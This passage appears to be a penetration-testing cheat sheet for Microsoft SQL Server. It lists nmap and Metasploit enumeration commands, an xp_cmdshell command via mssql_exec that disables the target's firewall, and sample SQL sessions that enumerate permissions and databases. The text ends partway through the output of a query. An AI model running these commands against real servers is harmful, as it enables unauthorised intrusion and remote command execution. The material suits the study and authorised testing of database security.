MSSQL - Microsoft SQL service. typically runs on TCP port 1433 & Hidden mode port - 2433
Enumeration
//NMAP - enumerate the server, version and info
nmap [IP]
nmap --script ms-sql-info -p 1433 [IP]
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 [IP]
//Metasploit - enumerate mssql info
use auxiliary/admin/mssql/mssql_enum
set RHOSTS [IP]
exploit
mssql_exec
The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.
msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
Enumerate SQL login accounts
// Metasploit - enumerate sql login accounts
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS [IP]
exploit
Enumerate domain accounts
//metasploit
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS [IP]
exploit
PowerUpSQL
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name subentity_name permission_name
------------ --------------- ------------------
server CONNECT SQL
server VIEW ANY DATABASE
Check out the databases available:
SQL> SELECT name FROM master.sys.databases
name
-----------
master
tempdb
model
msdb
volume
I can look for user generated tables on those databases:
SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> SELECT name FROM sysobjects WHERE xtype = 'U'
name
------------